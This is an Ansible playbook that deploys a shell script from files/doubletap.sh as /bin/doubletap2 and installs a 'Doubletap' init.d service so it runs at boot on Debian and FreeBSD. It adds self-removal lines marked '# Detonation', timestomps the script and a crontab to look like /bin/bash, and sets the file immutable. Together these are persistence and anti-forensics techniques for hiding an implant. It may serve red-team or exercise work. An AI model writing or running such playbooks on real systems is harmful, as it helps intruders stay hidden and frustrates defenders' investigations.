---
- name: Define variables for paths and filenames
  set_fact:
    script_path: "/bin/doubletap2"
    service_name: "Doubletap"

- name: Copy shell script to target system
  copy:
    src: "files/doubletap.sh"
    dest: "{{ script_path }}"
    mode: "0755"

- name: Modify script to add while loop
  lineinfile:
    path: "{{ script_path }}"
    line: |
      while true; do
    insertafter: "# Start of loop"

- name: Modify script to end while loop
  lineinfile:
    path: "{{ script_path }}"
    line: |
        sleep 60
      done
    insertafter: "# End of loop"

- name: Create init.d startup script
  copy:
    dest: "/etc/init.d/{{ service_name }}"
    mode: "0755"
    content: |
      #!/bin/sh
      ### BEGIN INIT INFO
      # Provides:          {{ service_name }}
      # Required-Start:    $network $remote_fs
      # Required-Stop:     $network $remote_fs
      # Default-Start:     2 3 4 5
      # Default-Stop:      0 1 6
      # Short-Description: Starts the daemon
      ### END INIT INFO

      case "$1" in
        start)
          echo "Starting {{ service_name }}"
          nohup {{ script_path }} &> /dev/null &
          ;;
        stop)
          echo "Stopping {{ service_name }}"
          pkill -f "{{ script_path }}"
          ;;
        restart)
          $0 stop
          $0 start
          ;;
        *)
          echo "Usage: $0 {start|stop|restart}"
          exit 1
      esac

      exit 0

- name: Enable service on boot (Ubuntu)
  command: update-rc.d {{ service_name }} defaults
  when: ansible_os_family == "Debian"

- name: Enable service on boot (FreeBSD)
  lineinfile:
    path: "/etc/rc.conf"
    line: "{{ service_name }}_enable=\"YES\""
  when: ansible_os_family == "FreeBSD"

- name: Start the service
  command: "/etc/init.d/{{ service_name }} start"

- name: Add command to delete the script after execution
  lineinfile:
    path: "{{ script_path }}"
    line: "rm -f {{ script_path }}"
    insertafter: "# Cleanup after explosion"

- name: Add script removal from startup task to the script
  lineinfile:
    path: "{{ script_path }}"
    line: "update-rc.d -f {{ service_name }} remove"
    insertafter: "# Detonation"

- name: Remove init.d script after execution (cleanup)
  lineinfile:
    path: "{{ script_path }}"
    line: "rm -f /etc/init.d/{{ service_name }}"
    insertafter: "# Detonation"

- name: Timestomp the crontab file
  command: touch -r /bin/bash /var/spool/cron/crontabs/{{ cron_job_user }}

- name: Timestomp script to match /bin/bash creation time
  shell: |
    touch -r /bin/bash {{ script_path }}

# TODO check that this should go after timestomp
- name: Set immutable attribute on script
  command: "chattr +i {{ script_path }}"
